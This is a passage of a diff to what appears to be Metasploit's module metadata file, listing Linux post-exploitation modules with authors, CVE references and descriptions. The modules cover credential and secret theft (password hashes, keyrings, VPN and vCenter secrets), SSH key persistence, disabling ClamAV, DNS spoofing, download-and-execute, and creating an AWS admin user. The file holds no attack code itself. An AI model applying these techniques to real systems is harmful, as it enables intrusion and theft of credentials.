"linux/gather/enum_containers", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_nagios_xi": { + "name": "Nagios XI Enumeration", + "fullname": "post/linux/gather/enum_nagios_xi", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-04-17", + "type": "post", + 
"author": [ + "Cale Smith" + ], + "description": "NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials,\n creating opportunities for lateral movement.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/enum_nagios_xi.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_nagios_xi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "post_linux/gather/enum_network": { + "name": "Linux Gather Network Information", + "fullname": "post/linux/gather/enum_network", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "ohdae ", + "Stephen Haywood " + ], + "description": "This module gathers network information from the target system\n IPTables rules, interfaces, wireless information, open and listening\n ports, active network connections, DNS information and SSH information.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/enum_network.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_network", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_protections": { + "name": "Linux Gather Protection Enumeration", + "fullname": 
"post/linux/gather/enum_protections", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "ohdae " + ], + "description": "This module checks whether popular system hardening mechanisms are\n in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also\n tries to find installed applications that can be used to hinder,\n prevent, or detect attacks, such as tripwire, snort, and apparmor.\n\n This module is meant to identify Linux Secure Modules (LSM) in addition\n to various antivirus, IDS/IPS, firewalls, sandboxes and other security\n related software.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 23:10:40 +0000", + "path": "/modules/post/linux/gather/enum_protections.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_protections", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_psk": { + "name": "Linux Gather NetworkManager 802-11-Wireless-Security Credentials", + "fullname": "post/linux/gather/enum_psk", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Cenk Kalpakoglu" + ], + "description": "This module collects 802-11-Wireless-Security credentials such as\n Access-Point name and Pre-Shared-Key from Linux NetworkManager\n connection configuration files.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-21 00:28:34 +0000", + "path": "/modules/post/linux/gather/enum_psk.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_psk", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_system": { + "name": "Linux Gather System and User Information", + "fullname": "post/linux/gather/enum_system", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "Stephen Haywood ", + "sinn3r ", + "ohdae ", + "Roberto Espreto " + ], + "description": "This module gathers system information. We collect\n installed packages, installed services, mount information,\n user list, user bash history and cron jobs", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/enum_system.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_system", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_users_history": { + "name": "Linux Gather User History", + "fullname": "post/linux/gather/enum_users_history", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "ohdae " + ], + "description": "This module gathers the following user-specific information:\n shell history, MySQL history, PostgreSQL history, MongoDB history,\n Vim history, lastlog, and sudoers.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": 
"/modules/post/linux/gather/enum_users_history.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_users_history", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/f5_loot_mcp": { + "name": "F5 Big-IP Gather Information from MCP Datastore", + "fullname": "post/linux/gather/f5_loot_mcp", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-11-16", + "type": "post", + "author": [ + "Ron Bowes" + ], + "description": "This module gathers various interesting pieces of data from F5's\n \"mcp\" datastore, which is accessed via /var/run/mcp using a\n proprietary protocol.\n\n Adapted from: https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-getloot.rb", + "references": [ + "URL-https://github.com/rbowes-r7/refreshing-mcp-tool", + "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/", + "URL-https://support.f5.com/csp/article/K97843387" + ], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/linux/gather/f5_loot_mcp.rb", + "is_install_path": true, + "ref_name": "linux/gather/f5_loot_mcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/gnome_commander_creds": { + "name": "Linux Gather Gnome-Commander Creds", + "fullname": "post/linux/gather/gnome_commander_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": 
"post", + "author": [ + "David Bloom" + ], + "description": "This module collects the clear text passwords stored by\n Gnome-commander, a GUI file explorer for GNOME. Typically, these\n passwords are stored in the user's home directory, at\n ~/.gnome-commander/connections.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/gnome_commander_creds.rb", + "is_install_path": true, + "ref_name": "linux/gather/gnome_commander_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/gnome_keyring_dump": { + "name": "Gnome-Keyring Dump", + "fullname": "post/linux/gather/gnome_keyring_dump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Spencer McIntyre" + ], + "description": "Use libgnome-keyring to extract network passwords for the current user.\n This module does not require root privileges to run.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/gnome_keyring_dump.rb", + "is_install_path": true, + "ref_name": "linux/gather/gnome_keyring_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/haserl_read": { + "name": "Haserl Arbitrary File Reader", + "fullname": "post/linux/gather/haserl_read", + 
"aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Julien (jvoisin) Voisin", + "Ike Broflovski" + ], + "description": "This module exploits haserl prior to 0.9.36 to read arbitrary files.\n The most widely accepted exploitation vector is reading /etc/shadow,\n which will reveal root's hash for cracking.", + "references": [ + "URL-https://twitter.com/steaIth/status/1364940271054712842", + "URL-https://gitlab.alpinelinux.org/alpine/aports/-/issues/12539", + "CVE-2021-29133" + ], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/linux/gather/haserl_read.rb", + "is_install_path": true, + "ref_name": "linux/gather/haserl_read", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/hashdump": { + "name": "Linux Gather Dump Password Hashes for Linux Systems", + "fullname": "post/linux/gather/hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Post Module to dump the password hashes for all users on a Linux System", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/hashdump.rb", + "is_install_path": true, + "ref_name": "linux/gather/hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + 
"needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/manageengine_password_manager_creds": { + "name": "Linux Gather ManageEngine Password Manager Pro Password Extractor", + "fullname": "post/linux/gather/manageengine_password_manager_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Travis Kaun", + "Rob Simon", + "Charles Yost", + "Christophe De La Fuente" + ], + "description": "This module gathers the encrypted passwords stored by Password Manager\n Pro and decrypt them using key materials stored in multiple\n configuration files.", + "references": [ + "URL-https://www.trustedsec.com/blog/the-curious-case-of-the-password-database/", + "URL-https://github.com/trustedsec/Zoinks/blob/main/zoinks.py" + ], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-02 14:03:15 +0000", + "path": "/modules/post/linux/gather/manageengine_password_manager_creds.rb", + "is_install_path": true, + "ref_name": "linux/gather/manageengine_password_manager_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/mimipenguin": { + "name": "MimiPenguin", + "fullname": "post/linux/gather/mimipenguin", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-05-23", + "type": "post", + "author": [ + "huntergregal", + "bcoles ", + "Shelby Pace" + ], + "description": "This searches process memory for needles that indicate\n where cleartext passwords may be located. 
If any needles\n are discovered in the target process memory, collected\n strings in adjacent memory will be hashed and compared\n with password hashes found in `/etc/shadow`.", + "references": [ + "URL-https://github.com/huntergregal/mimipenguin", + "URL-https://bugs.launchpad.net/ubuntu/+source/gnome-keyring/+bug/1772919", + "URL-https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490", + "CVE-2018-20781" + ], + "platform": "Linux", + "arch": "x86, x64, aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/linux/gather/mimipenguin.rb", + "is_install_path": true, + "ref_name": "linux/gather/mimipenguin", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/mount_cifs_creds": { + "name": "Linux Gather Saved mount.cifs/mount.smbfs Credentials", + "fullname": "post/linux/gather/mount_cifs_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "Post Module to obtain credentials saved for mount.cifs/mount.smbfs in\n /etc/fstab on a Linux system.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/mount_cifs_creds.rb", + "is_install_path": true, + "ref_name": "linux/gather/mount_cifs_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + 
"post_linux/gather/openvpn_credentials": { + "name": "OpenVPN Gather Credentials", + "fullname": "post/linux/gather/openvpn_credentials", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "rvrsh3ll", + "Roberto Soares Espreto " + ], + "description": "This module grab OpenVPN credentials from a running process\n in Linux.\n\n Note: --auth-nocache must not be set in the OpenVPN command line.", + "references": [ + "URL-https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh" + ], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/gather/openvpn_credentials.rb", + "is_install_path": true, + "ref_name": "linux/gather/openvpn_credentials", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/phpmyadmin_credsteal": { + "name": "Phpmyadmin credentials stealer", + "fullname": "post/linux/gather/phpmyadmin_credsteal", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Chaitanya Haritash [bofheaded]", + "Dhiraj Mishra " + ], + "description": "This module gathers Phpmyadmin creds from target linux machine.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/phpmyadmin_credsteal.rb", + "is_install_path": true, + "ref_name": "linux/gather/phpmyadmin_credsteal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + 
"Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/pptpd_chap_secrets": { + "name": "Linux Gather PPTP VPN chap-secrets Credentials", + "fullname": "post/linux/gather/pptpd_chap_secrets", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module collects PPTP VPN information such as client, server, password,\n and IP from your target server's chap-secrets file.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/pptpd_chap_secrets.rb", + "is_install_path": true, + "ref_name": "linux/gather/pptpd_chap_secrets", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/puppet": { + "name": "Puppet Config Gather", + "fullname": "post/linux/gather/puppet", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die" + ], + "description": "This module will grab Puppet config files, credentials, host information, and file buckets.", + "references": [ + "URL-https://github.com/Tikam02/DevOps-Guide/blob/master/Infrastructure-provisioning/Puppet/puppet-commands.md" + ], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/gather/puppet.rb", + "is_install_path": true, + "ref_name": "linux/gather/puppet", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" 
+ ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/rancher_audit_log_leak": { + "name": "Rancher Audit Log Sensitive Information Leak", + "fullname": "post/linux/gather/rancher_audit_log_leak", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-02-08", + "type": "post", + "author": [ + "h00die" + ], + "description": "Rancher versions between 2.6.0-2.6.13, 2.7.0-2.7.9, 2.8.0-2.8.1 inclusive\n contain a vulnerability where sensitive data is leaked into the audit logs.\n Rancher Audit Logging is an opt-in feature, only deployments that have it\n enabled and have AUDIT_LEVEL set to 1 or above are impacted by this issue.\n\n Tested against rancher 2.6.0.", + "references": [ + "URL-https://github.com/rancher/rancher/security/advisories/GHSA-xfj7-qf8w-2gcr", + "URL-https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#api-audit-log-options", + "CVE-2023-22649" + ], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/linux/gather/rancher_audit_log_leak.rb", + "is_install_path": true, + "ref_name": "linux/gather/rancher_audit_log_leak", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/tor_hiddenservices": { + "name": "Linux Gather TOR Hidden Services", + "fullname": "post/linux/gather/tor_hiddenservices", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Harvey Phillips " + ], + "description": "This module collects the hostnames name and private keys of\n any TOR Hidden Services 
running on the target machine. It\n will search for torrc and if found, will parse it for the\n directories of Hidden Services. However, root permissions\n are required to read them as they are owned by the user that\n TOR runs as, usually a separate account.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/tor_hiddenservices.rb", + "is_install_path": true, + "ref_name": "linux/gather/tor_hiddenservices", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/vcenter_secrets_dump": { + "name": "VMware vCenter Secrets Dump", + "fullname": "post/linux/gather/vcenter_secrets_dump", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-04-15", + "type": "post", + "author": [ + "npm ", + "Erik Wynter", + "h00die" + ], + "description": "Grab secrets and keys from the vCenter server and add them to\n loot. This module is tested against the vCenter appliance only;\n it will not work on Windows vCenter instances. It is intended to\n be run after successfully acquiring root access on a vCenter\n appliance and is useful for penetrating further into the\n environment following a vCenter exploit that results in a root\n shell.\n\n Secrets include the dcAccountDN and dcAccountPassword for\n the vCenter machine which can be used for maniuplating the SSO\n domain via standard LDAP interface; good for plugging into the\n vmware_vcenter_vmdir_ldap module or for adding new SSO admin\n users. 
The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with\n associated private keys are also plundered and can be used to\n sign forged SAML assertions for the /ui admin interface.", + "references": [ + "URL-https://github.com/shmilylty/vhost_password_decrypt", + "CVE-2022-22948", + "URL-https://pentera.io/blog/information-disclosure-in-vmware-vcenter/", + "URL-https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb" + ], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-04-12 13:09:34 +0000", + "path": "/modules/post/linux/gather/vcenter_secrets_dump.rb", + "is_install_path": true, + "ref_name": "linux/gather/vcenter_secrets_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "Dump", + "description": "Dump vCenter Secrets" + } + ] + }, + "post_linux/manage/adduser": { + "name": "Add a new user to the system", + "fullname": "post/linux/manage/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Nick Cottrell " + ], + "description": "This command adds a new user to the system", + "references": [], + "platform": "AIX,BSD,Linux,Solaris,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-10-25 19:28:23 +0000", + "path": "/modules/post/linux/manage/adduser.rb", + "is_install_path": true, + "ref_name": "linux/manage/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "config-changes" + ] 
+ }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/manage/disable_clamav": { + "name": "Disable ClamAV", + "fullname": "post/linux/manage/disable_clamav", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "DLL_Cool_J" + ], + "description": "This module will write to the ClamAV Unix socket to shutoff ClamAV.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/linux/manage/disable_clamav.rb", + "is_install_path": true, + "ref_name": "linux/manage/disable_clamav", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/manage/dns_spoofing": { + "name": "Native DNS Spoofing module", + "fullname": "post/linux/manage/dns_spoofing", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Alberto Rafael Rodriguez Iglesias " + ], + "description": "This module will be applied on a session connected to a shell. 
It will redirect DNS Request to remote DNS server.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/manage/dns_spoofing.rb", + "is_install_path": true, + "ref_name": "linux/manage/dns_spoofing", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/manage/download_exec": { + "name": "Linux Manage Download and Execute", + "fullname": "post/linux/manage/download_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joshua D. Abraham " + ], + "description": "This module downloads and runs a file with bash. It first tries to use curl as\n its HTTP client and then wget if it's not found. Bash found in the PATH is used\n to execute the file.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/manage/download_exec.rb", + "is_install_path": true, + "ref_name": "linux/manage/download_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/manage/geutebruck_post_exp": { + "name": "Geutebruck Camera Deface", + "fullname": "post/linux/manage/geutebruck_post_exp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ibrahim Ayadhi", + "Sébastien Charbonnier" + ], + "description": "This module will take an existing session on a vulnerable Geutebruck 
Camera\n and will allow the user to either freeze the camera and display the last\n image from the video stream, display an image on the camera, or restore\n the camera back to displaying the current feed/stream.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2021-09-03 12:30:12 +0000", + "path": "/modules/post/linux/manage/geutebruck_post_exp.rb", + "is_install_path": true, + "ref_name": "linux/manage/geutebruck_post_exp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "CHANGE_IMAGE", + "description": "Display an arbitrary image instead of the video stream" + }, + { + "name": "FREEZE_CAMERA", + "description": "Freeze the camera and display the last image taken from the video stream" + }, + { + "name": "RESUME_STREAM", + "description": "Resume the camera's video stream and display the current live feed" + } + ] + }, + "post_linux/manage/iptables_removal": { + "name": "IPTABLES rules removal", + "fullname": "post/linux/manage/iptables_removal", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Alberto Rafael Rodriguez Iglesias " + ], + "description": "This module will be applied on a session connected to a shell. 
It will remove all IPTABLES rules.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/manage/iptables_removal.rb", + "is_install_path": true, + "ref_name": "linux/manage/iptables_removal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/manage/pseudo_shell": { + "name": "Pseudo-Shell Post-Exploitation Module", + "fullname": "post/linux/manage/pseudo_shell", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Alberto Rafael Rodriguez Iglesias " + ], + "description": "This module will run a Pseudo-Shell.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/manage/pseudo_shell.rb", + "is_install_path": true, + "ref_name": "linux/manage/pseudo_shell", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/manage/sshkey_persistence": { + "name": "SSH Key Persistence", + "fullname": "post/linux/manage/sshkey_persistence", + "aliases": [], + "rank": 600, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die " + ], + "description": "This module will add an SSH key to a specified user (or all), to allow\n remote login via SSH at any time.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": 
"/modules/post/linux/manage/sshkey_persistence.rb", + "is_install_path": true, + "ref_name": "linux/manage/sshkey_persistence", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/escalate/aws_create_iam_user": { + "name": "Create an AWS IAM User", + "fullname": "post/multi/escalate/aws_create_iam_user", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Javier Godinez ", + "Jon Hart " + ], + "description": "This module will attempt to create an AWS (Amazon Web Services) IAM\n (Identity and Access Management) user with Admin privileges.", + "references": [ + "URL-https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf" + ], + "platform": "Unix", + "arch": "", + "rport": 443, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/escalate/aws_create_iam_user.rb", + "is_install_path": true, + "ref_name": "multi/escalate/aws_create_iam_user", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/escalate/cups_root_file_read": { + "name": "CUPS 1.6.1 Root File Read", + "fullname": 